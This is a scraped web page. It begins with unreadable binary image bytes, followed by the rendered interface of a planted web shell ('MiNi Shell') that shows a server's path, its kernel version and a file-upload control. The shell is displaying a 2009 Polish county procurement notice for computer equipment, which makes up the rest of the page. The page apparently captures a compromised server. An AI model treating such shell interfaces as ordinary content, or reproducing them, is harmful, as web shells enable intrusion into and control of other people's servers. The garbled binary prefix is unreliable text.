JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090701/217874-N-2009.html

<p class="kh_header"><b>Ząbkowice Śląskie: Dostawa  - Urządzeń komputerowych, oprogramowania  i maszyn biurowych.</b><br>
<b>Numer ogłoszenia: 217874 - 2009; data zamieszczenia: 01.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Ząbkowicach Śląskich , ul. Sienkiewicza 11, 57-200 Ząbkowice Śląskie, woj. dolnośląskie, tel. 074 8162800, faks 074 8162850.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  - Urządzeń komputerowych, oprogramowania  i maszyn biurowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa - Urządzeń komputerowych, oprogramowania i maszyn biurowych.
Zakres zamówienia:
1.	Zestaw komputerowy Nr 1 - 2 szt. (jednostka centralna,  klawiatura, myszka, oprogramowanie),
2.	Zestaw komputerowy Nr 2 - 2 szt. (jednostka centralna, monitor, klawiatura, myszka, oprogramowanie),
3.	Zestaw komputerowy Nr 3  - 1 szt. (jednostka centralna, klawiatura, myszka, oprogramowanie),
4.	Laptop nr 1 - 2 szt.
5.	Laptop nr 2 - 1 szt.
6.	Laptop nr 3 - 1 szt.
7.	Drukarka kolorowa atramentowa A3 - 1 szt.
8.	Urządzenie wielofunkcyjne atramentowe kolorowe - 1 szt.
9.	Urządzenie wielofunkcyjne laserowe kolorowe - 1 szt.
10.	Zasilacz awaryjny UPS - 10 szt.
11.	Nagrywarka DVD - 1 szt.
12.	Listwa antyprzepięciowa - 12 szt.
13.	Myszki laserowe - 18 szt.
14.	Klawiatura - 14 szt.
15.	Zasilacz ATX - 6 szt.
16.	Karta PCI - kontroler USB - 1 szt.
17.	Głośniki komputerowe - 1 szt.
18.	Dysk twardy IDE - 2 szt.
19.	Dysk twardy SATA - 3 szt.
20.	Monitor LCD 22 -7 szt. 
21.	Switch - 5 szt.
22.	Pamięć DDR - 2 szt.
23.	Pamięć DDR 2  - 2 szt.
24.	Czytnik kart pamięci - 1 szt.
25.	Tester okablowania - 1 szt.
26.	Kabel sieciowy - 1 szt.
27.	Wtyki RJ45 - 2  szt.
28.	Telefax - 1 szt.
29.	Skaner A3 - 1 szt.
30.	Dodatkowa kaseta na papier do Canona IR2018 - 1 szt.
31.	Dysk 250GB 2.5 - 2 szt.
32.	Microsoft Office 2007 PL - 4 szt.
33.	Microsoft XP Professional PL -2 szt.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.23.33.00-8, 30.21.31.00-6, 30.23.21.30-4, 30.23.21.10-8, 29.85.00.00-2, 30.23.31.53-8, 30.23.72.00-1, 30.23.74.10-6, 30.23.74.60-1, 30.23.72.80-5, 30.23.71.30-9, 32.34.24.12-3, 32.23.41.00-9, 30.23.13.00-0, 32.42.00.00-3, 30.23.72.30-0, 30.23.72.00-1, 32.42.10.00-0, 32.42.20.00-7, 30.12.14.10-0, 30.21.61.10-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający  żąda wniesienia wadium w kwocie 1,800  zł
2. Wadium może być wnoszone w jednej lub kilku następujących formach: 
    1) w pieniądzu : 
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z 
        tym że poręczenie kasy jest zawsze poręczeniem pieniężnym:
    3) gwarancjach bankowych:
    4) gwarancjach ubezpieczeniowych: 
    5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy z 
       dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.jedn.
        Dz. U. z 2007r. Nr 42, poz.275). 
3. Wadium wnoszone w pieniądzu wpłaca się przelewem  na rachunek bankowy Zamawiającego
     nr 10 9533 0004 2001 0002 6260 0007 w Banku Spółdzielczym w Ząbkowicach Śl.       
     Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego 
     przelewu. Na poleceniu przelewu należy wpisać Przedmiotem zamówienia jest dostawa -Urządzeń 
     komputerowych, oprogramowania i maszyn biurowych.
     W pozostałych przypadkach wymagane jest dołączenie oryginału dokumentu wystawionego na 
     rzecz Zamawiającego. Dokumenty, o których mowa w  pkt.2 ppkt. 2 -5  muszą zachowywać 
     ważność przez cały okres, w którym Wykonawca jest związany ofertą. Posiadać zapis o treści: 
     gwarancja płatna nieodwołalnie i bezwarunkowo na pierwsze pisemne żądanie zapłaty 
     Zamawiającego do pełnej sumy wysokości wadium. 
 4.Wadium wnosi się przed upływem terminu składania ofert. Przy czym za termin wniesienia wadium
     w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.
 5. Z udziału w postępowaniu wyklucza się Wykonawców, którzy nie wnieśli wadium w wymaganym
     terminie.   7. Zamawiający dokona zwrotu wadium zgodnie z warunkami określonymi w art. 46 ustawy   
     Prawo zamówień publicznych.
 8. Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono   
     wadium na podstawie art. 46 ust. 2 pkt. 2 i 3 ustawy Pzp, jeżeli w wyniku ostatecznego
     rozstrzygnięcia protestu, unieważniono czynność wykluczenia Wykonawcy lub odrzucenia oferty.
     Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
 9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli na wezwanie Wykonawca w  określonym terminie nie złożył wymaganych przez Zamawiającego dokumentów lub oświadczeń, o 
    których mowa  w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw, albo złożyli wymagane przez 
     Zamawiającego oświadczenia i dokumenty, o których mowa w art.25.ust.1 zawierające błędy lub 
     którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo 
     złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie 
     postępowania.  Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny   
     potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz  spełnienie
     przez oferowane roboty budowlane wymagań określonych przez Zamawiającego, nie  później niż w 
     dniu w którym upłynął termin składania ofert.
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została   
     wybrana :
    1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w  
        ofercie,
    2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
    3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących 
        po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:
    - posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy 
      nakładają obowiązek posiadania takich uprawnień,
   - posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami 
      zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów    
      do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
   - znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
   - nie podlegają wykluczeniu z postępowania o udzielenie zamówienia z art. 24 ust.1 i 2 ustawy  
      Prawo zamówień publicznych, 
2. Opis sposobu dokonywania oceny spełnienia  warunków:
    Zostanie dokonana na podstawie analizy dokumentów dołączonych do oferty, które zostały
    określone w Specyfikacji Istotnych Warunków Zamówienia zgodnie z formułą spełnia- nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na ofertę składają się następujące dokumenty i załączniki: 
1. Formularz oferty - z wykorzystaniem wzoru zał. nr 2 do SIWZ,
2. Formularz cenowy -  z wykorzystaniem wzoru zał. nr 3 do SIWZ,
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji
    działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do
    ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem 
    terminu składania ofert,  
4. Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów 
    prawa lub innych dokumentów rejestrowych,
5. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że 
    Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane 
    prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
    wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące prze upływem 
       terminu składania ofert,
     6. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy 
         Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem 
         opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał 
         przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
         wstrzymanie wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące 
         przed upływem terminu składania ofert,
7. Wykaz wykonanych przynajmniej 3 dostaw, w okresie ostatnich trzech lat przed dniem wszczęcia 
    niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest
    krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym 
    przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z 
    dokumentami potwierdzającymi, że dostawy te zostały wykonane należycie - z wykorzystaniem 
    wzoru załącznik nr 4 do SIWZ. 
8. Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z
    art.22.ust.1 i art. 24 ust.1 i 2 ustawy Prawo zamówień publicznych - z wykorzystaniem wzoru 
    załącznik nr 5 do SIWZ. 
9. Zaakceptowany projekt umowy - załącznik nr 6 do SIWZ.
10. Dowód wniesienia wadium.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zabkowicki.powiat.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
      ul. Sienkiewicza 11 
      57-200 Ząbkowice Śl.
      pok.110.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2009 godzina 09:00, miejsce: Starostwo Powiatowe
      ul. Sienkiewicza 11 
      57-200 Ząbkowice Śl.
            Sekretariat pok. 202.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com